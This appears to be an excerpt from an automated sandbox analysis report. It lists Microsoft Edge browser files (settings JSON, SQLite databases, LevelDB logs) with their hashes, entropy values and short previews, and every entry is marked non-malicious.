                                                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.648152292571476
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:aj9P0vTQkQerkjlxP/KbtLc7gam6IThj773pLLRKToaAu:ad8Te2mlxP/NajF7NRKcC
                                                                                                                                                                                                                                                                                                MD5:AE7AC53BAA5544A786E4199B61372056
                                                                                                                                                                                                                                                                                                SHA1:53116E52A28E2675564A17635763D735EB8977C2
                                                                                                                                                                                                                                                                                                SHA-256:365E7A2B1E71E4E94D2C02E0A6F842DABB7B9163CD84F6681B477C99FEC9B9F7
                                                                                                                                                                                                                                                                                                SHA-512:D02AB18CE7D6A0BA228409AB446802998ED5B02AE76EA9DDD41A4A87C8671463AFBA68738FC0E2C36627E367E1D44EE960844825DC6593D2F4E0EBD19347B475
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):411
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.243445970722836
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:7p423+vLZYeb8rcHEZrELFUtL4U2W/l4U9V54ZYeb8rcHEZrEZSJ:7WDlYeb8nZrExgEUAUVoYeb8nZrEZe
                                                                                                                                                                                                                                                                                                MD5:A00A7BCE2BEA10E5E400563FBB231254
                                                                                                                                                                                                                                                                                                SHA1:0788AC7B692491D98E6DE10BF6026718F03EFD0C
                                                                                                                                                                                                                                                                                                SHA-256:F9A29E8BE652F2AB59434DB94870E47F252C3DCC96E5358770114B942750F26D
                                                                                                                                                                                                                                                                                                SHA-512:69244872249295884309E2A16DDA37F1DDCBA2812A192E22F5C87647C0E26909EE97927757E154033A27B6BA941E46058E9FB139DAA6B138818FA5B0662939E2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:09.559 a3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/07-07:19:09.560 a3c Recovering log #3.2025/01/07-07:19:09.560 a3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):411
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.243445970722836
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:7p423+vLZYeb8rcHEZrELFUtL4U2W/l4U9V54ZYeb8rcHEZrEZSJ:7WDlYeb8nZrExgEUAUVoYeb8nZrEZe
                                                                                                                                                                                                                                                                                                MD5:A00A7BCE2BEA10E5E400563FBB231254
                                                                                                                                                                                                                                                                                                SHA1:0788AC7B692491D98E6DE10BF6026718F03EFD0C
                                                                                                                                                                                                                                                                                                SHA-256:F9A29E8BE652F2AB59434DB94870E47F252C3DCC96E5358770114B942750F26D
                                                                                                                                                                                                                                                                                                SHA-512:69244872249295884309E2A16DDA37F1DDCBA2812A192E22F5C87647C0E26909EE97927757E154033A27B6BA941E46058E9FB139DAA6B138818FA5B0662939E2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:09.559 a3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/07-07:19:09.560 a3c Recovering log #3.2025/01/07-07:19:09.560 a3c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1661
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.636711375358271
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:3AtZxWYNc5ev2+6XZsJV03Sx4Lyls3ycUW7AHHk2GJ341:QtHpN+ev2+4GJ2osQxdP1
                                                                                                                                                                                                                                                                                                MD5:A2B5CE0AD2E744220F20B9F16436B0B8
                                                                                                                                                                                                                                                                                                SHA1:AA9C53C2D21D3863C0166E516F468AF244E5657F
                                                                                                                                                                                                                                                                                                SHA-256:768314D453453441060B2CB7A3ED92A5DF869771B35D763C85161E96F1B3470E
                                                                                                                                                                                                                                                                                                SHA-512:BA138E238A3AE476AA2D01B28102FF792C0852CCE63C109EAE79B36CE07E15306A4E84B02129CD368262AA91298FB21B9D666CF60F485E15A54A06C795F4A9FF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:'..q:................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult@.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":1046}.!_https://ntp.msn.com..LastKnownPV..1736252351370.-_https://ntp.msn.com..LastVisuallyReadyMarker..1736252353130.._https://ntp.msn.com..MUID!.040C031DFB13691C1F601670FA61685C.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1736252351448,"schedule":[-1,-1,29,-1,-1,20,12],"scheduleFixed":[-1,-1,29,-1,-1,20,12],"simpleSchedule":[49,42,35,37,30,12,36]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1736252351334.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250106.365"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_ht
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):339
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.144686961471085
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp4F44q2PcNwi23oH+Tcwt8a2jMGIFUtL4GOhZmwl4Bc3DkwOcNwi23oH+Tcwtw:7p4FnvLZYeb8EFUtL4t/l4BGD54ZYebw
                                                                                                                                                                                                                                                                                                MD5:0BAFCBC9B7F30C98337741D22F0F9C72
                                                                                                                                                                                                                                                                                                SHA1:53ECA080BE6AC382B14CD44E4FBC30F51822FEEB
                                                                                                                                                                                                                                                                                                SHA-256:FB572EDB9F2F3BC0DB83B3D52D2F0DC8325CF808469EA75D9796C9F363289CD7
                                                                                                                                                                                                                                                                                                SHA-512:EE269D46BF238B3154EE13BAB684F59FE00E3519F2AD7FC989BB2BC961B24992DF2FD2C112055C404FE844E37F858A12E085A41A8A415FED0341AAAAA72CC867
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.818 f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/07-07:19:03.820 f70 Recovering log #3.2025/01/07-07:19:03.823 f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):339
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.144686961471085
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp4F44q2PcNwi23oH+Tcwt8a2jMGIFUtL4GOhZmwl4Bc3DkwOcNwi23oH+Tcwtw:7p4FnvLZYeb8EFUtL4t/l4BGD54ZYebw
                                                                                                                                                                                                                                                                                                MD5:0BAFCBC9B7F30C98337741D22F0F9C72
                                                                                                                                                                                                                                                                                                SHA1:53ECA080BE6AC382B14CD44E4FBC30F51822FEEB
                                                                                                                                                                                                                                                                                                SHA-256:FB572EDB9F2F3BC0DB83B3D52D2F0DC8325CF808469EA75D9796C9F363289CD7
                                                                                                                                                                                                                                                                                                SHA-512:EE269D46BF238B3154EE13BAB684F59FE00E3519F2AD7FC989BB2BC961B24992DF2FD2C112055C404FE844E37F858A12E085A41A8A415FED0341AAAAA72CC867
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.818 f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/07-07:19:03.820 f70 Recovering log #3.2025/01/07-07:19:03.823 f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):2.761269762612523
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:tTwN2bQNl0/Dd8hL4v/iEaHqxXcf0L/ZJVb:VwN28N2/Dd8hL4aXqxXI0LhJVb
                                                                                                                                                                                                                                                                                                MD5:E3B6A203D24A437887EFE13E152AE5E2
                                                                                                                                                                                                                                                                                                SHA1:A1ABE0F1545E08BCB15E70B6A0D4E60AA2D754F6
                                                                                                                                                                                                                                                                                                SHA-256:5DCDE0CC406969715DADD5E5505BB7DA1694140B1776CBBEE7369920828EEBA0
                                                                                                                                                                                                                                                                                                SHA-512:0BF8E59E9525454D09422E6577DED07417DA145532918036A68AD8E67D1E03DAB7DB59DB82D8D04FCAE9C21BBE95BB494C4DCE556DCACCC4AE55D0043841EAC3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1768
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.299960161457848
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YcCpfgCzsIWtsUfcKsZleeBkBRsxJCgHxYhbyDF:F2fVWbGkeBkBcTehy
                                                                                                                                                                                                                                                                                                MD5:781B714C99A7CA21996B67BBBFFBD01D
                                                                                                                                                                                                                                                                                                SHA1:776D82B3C79DC8B95B598E9FC6C60F1D2CFBC4CA
                                                                                                                                                                                                                                                                                                SHA-256:F24AAB5A0787AA9CED54BD6786634D9A7EFA8C4DEF480E27A640FE2911C21884
                                                                                                                                                                                                                                                                                                SHA-512:9C4CB9819A2D7E965A516C58B261D1BA9F4BBA714DB23294315981787EEF5FD8DE865817D0AF4822F449370D92646C2B8145B703B5559E63C63B957F68E79C3C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383317945645470","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383317950578672","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380819551657533","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA="
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.2784305022430231
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:T6IopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSDW1U:OIEumQv8m1ccnvSVDHiiYM1a
                                                                                                                                                                                                                                                                                                MD5:AC27F7CCBD21C1BB76B179B322024AC4
                                                                                                                                                                                                                                                                                                SHA1:E3228753B27DBD01E8A21FC2E70C08B2C23ABB63
                                                                                                                                                                                                                                                                                                SHA-256:F4622942430A10CD588A2D07F3F14E185B8B934CDF6AB1A176C527F8100387F3
                                                                                                                                                                                                                                                                                                SHA-512:C1FFBC689379B6A72CC95531E48FC62608A12067C5C11FF2306CB26DBCE54614BEFF7F16E0EF836415306D34F92C765C11F6DDBAF83E9414B3886571B9EA3BCE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):1768
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.299960161457848
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YcCpfgCzsIWtsUfcKsZleeBkBRsxJCgHxYhbyDF:F2fVWbGkeBkBcTehy
                                                                                                                                                                                                                                                                                                MD5:781B714C99A7CA21996B67BBBFFBD01D
                                                                                                                                                                                                                                                                                                SHA1:776D82B3C79DC8B95B598E9FC6C60F1D2CFBC4CA
                                                                                                                                                                                                                                                                                                SHA-256:F24AAB5A0787AA9CED54BD6786634D9A7EFA8C4DEF480E27A640FE2911C21884
                                                                                                                                                                                                                                                                                                SHA-512:9C4CB9819A2D7E965A516C58B261D1BA9F4BBA714DB23294315981787EEF5FD8DE865817D0AF4822F449370D92646C2B8145B703B5559E63C63B957F68E79C3C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383317945645470","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383317950578672","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380819551657533","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA="
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13719
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.234589049081205
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stxJ99QTryDigabatSuypwsOzyaNP9ktuYUimDY8EbV+FOdQwaxNPZYJ:stxPGKSu4wsOztJArbGgQwz
                                                                                                                                                                                                                                                                                                MD5:22729E27937C44A3F143830FBCF1ECA2
                                                                                                                                                                                                                                                                                                SHA1:E2662240F980FD708F25413D97533881446A4ED0
                                                                                                                                                                                                                                                                                                SHA-256:CCC1D4F53F0F9C2044465ADA6907862100C4C879571B3A070133777920256890
                                                                                                                                                                                                                                                                                                SHA-512:E70CE793EBA7597830C3A2073B3D5D69EC57EBD52B3317186D152E13A5E9A6A0782876094A51CD6A229524B688BF9C6B278C30B876264334EA6E6BAE15E14EA3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380725943535883","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):37149
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.564316420305124
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:lxqOypWPKsfG78F1+UoAYDCx9Tuqh0VfUC9xbog/OVmwIPAd/rwqWfQqKputur:lxqOypWPKsfG7u1jaDwIIdMqWfJXtg
                                                                                                                                                                                                                                                                                                MD5:6D0BE52BC6B600F6DDE27421D7177034
                                                                                                                                                                                                                                                                                                SHA1:8B06AD28115183F7CA30EB7BB7A56E54A4D2A0AC
                                                                                                                                                                                                                                                                                                SHA-256:220494D2EE786880E010A622C59362F5EA917467CF90539D6EF9FAF669C4EC95
                                                                                                                                                                                                                                                                                                SHA-512:B72C0DE1A4EDE9DE731FF83A8899148E0BA953D91D6A05C6E2F71469B11CE1D2E755D9B0BEFA10B521D7C03B84A7D8D4DB1279677264BC47AA35CE76C1142947
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380725942936385","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380725942936385","location":5,"ma
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2394
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.806298525485997
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:F2xc5NmywcncmoDCRORpllg2hE4fRHeldCRORpllg2hR7ygFCRORpllg2hEjRHe3:F2emyBMrd64fB+rdn26rd6jBsrdlBF
                                                                                                                                                                                                                                                                                                MD5:E24A3A67519AC09E8453491801539E99
                                                                                                                                                                                                                                                                                                SHA1:C932BC1ED4BC50CFD57BDA5435940307C23E0209
                                                                                                                                                                                                                                                                                                SHA-256:06A175C813622C5AB9DC9EDE774C28ACB94D34EF1B90C17A2172E930B97462F2
